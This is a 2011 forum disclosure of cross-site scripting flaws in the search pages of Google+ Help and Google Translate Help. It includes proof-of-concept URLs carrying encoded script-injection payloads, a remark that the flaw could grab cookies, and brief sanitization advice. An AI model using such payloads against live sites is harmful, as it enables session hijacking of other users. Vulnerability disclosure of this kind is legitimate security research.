• Google+ Help Support & Google Translator Help Support [XSS]

    by
    [s]
    Published on 07-25-2011 10:35 AM      Number of Views: 765  
    0 Comments Comments
    ------------------------------------------------------------------
    0x1 Affected Script: Google+ Help Support & Google+ Help Support & Google Translator Help Support

    0x2 Script Link: http://translate.google.com/ & http://plus.google.com/
    0x4 Author: Sandeep kamble
    0x5 Reported : June 30 2010
    0x6 Public Release July 21 2010
    ------------------------------------------------------------------

    Affected Script Overview : Google+ Help Center where you can find tips and tutorials on using Google+ and other answers to frequently asked questions and Google Translate Help Center where you can find tips and tutorials on using Google Translate and other answers to frequently asked questions.

    Affected script :
    1) +/bin/search.py?query=
    2) support/bin/search.py?query= (Subdomain Translator)

    Exploit : Executing Javascript using the vulnerable variable called as ?Query . This attack is commonly know as Cross Site Scripting (XSS)
    Google + affected script having stored Xss attack which can used for the grabbing the cookies .
    Google Translator Non-persistent XSS attack which can be used to execute only the JS Script

    POC :
    1) Google +
    Code:
    http://www.google.com/support/+/bin/search.py?query=%22%3E%3Cscript%3Ealert%28%27ss%27%29%3C/script%3E&btnG=Search

    Don't shock , you might be thinking the payload "alert('ss')" and give output as "XSS" in message . This is happen due to spelling (google function did u meant it) ..

    Try to search this keyword
    Code:
    <script>alert('ss')</script>
    you will get the answer why it was coming.

    2) Translator Google
    Code:
    http://translate.google.com/support/bin/search.py?query=%22%3E%3Cscript%3Ealert%28%27s%27%29%3C%2Fscript%3E&btnG=Search+Help&ctx=en%3Asearchbox
    I don't have screen shot of Google translator XSS attack.

    Countermeasure

    1) Determine whether HTML output includes input parameters
    2) In short perform input sanitization

    Special Thanks : Rahul fbone , Bond, 41.w4r10r, Subhash, ShriNivas , Vishal , Yogesh, Darshit

    Finally you can See my name at
    Code:
    http://www.google.com/about/corporate/company/halloffame.html
    /peace

    Sandeep k
    This article was originally published in forum thread: Google+ Help Support & Google Translator Help Support [XSS] started by [s] View original post

  • G4H Twitter

  • Latest Posts

    amolnaik4

    Research Resources for MS SharePoint

    This page contains research notes on Microsoft’s SharePoint MOSS and WSS.

    Link:
    https://www.owasp.org/index.php/Research_for_SharePoint_%28MOSS%29

    amolnaik4 Today, 12:25 PM Go to last post
    b0nd

    Lolz, with the title "About Admin" I thought...

    Lolz, with the title "About Admin" I thought Admins of garage have been exposed ;)

    @hazard74, there is always a proper "way" to ask - you need to discover that. It's not that Pentesters don't have...

    b0nd Today, 09:10 AM Go to last post
    hazard74

    Ok, Anant Shrivastava. Im Sorry :)

    Ok, Anant Shrivastava.

    Im Sorry :)

    hazard74 Yesterday, 06:19 PM Go to last post
    Anant Shrivastava

    not exactly this format but a simmilar kind of a...

    not exactly this format but a simmilar kind of a format i have seen as part of malware. This url format was used to get the commands from the remote server. there was a whole bunch of domain names in...

    Anant Shrivastava Yesterday, 05:30 PM Go to last post
    Immaturedevil

    Hi Neo, Thanks for your comment. I have...

    Hi Neo,

    Thanks for your comment. I have already done that... but no success..as these URLs are not recognized by search engines as such. getting some info if anyone has come across with URLs in...

    Immaturedevil Yesterday, 05:21 PM Go to last post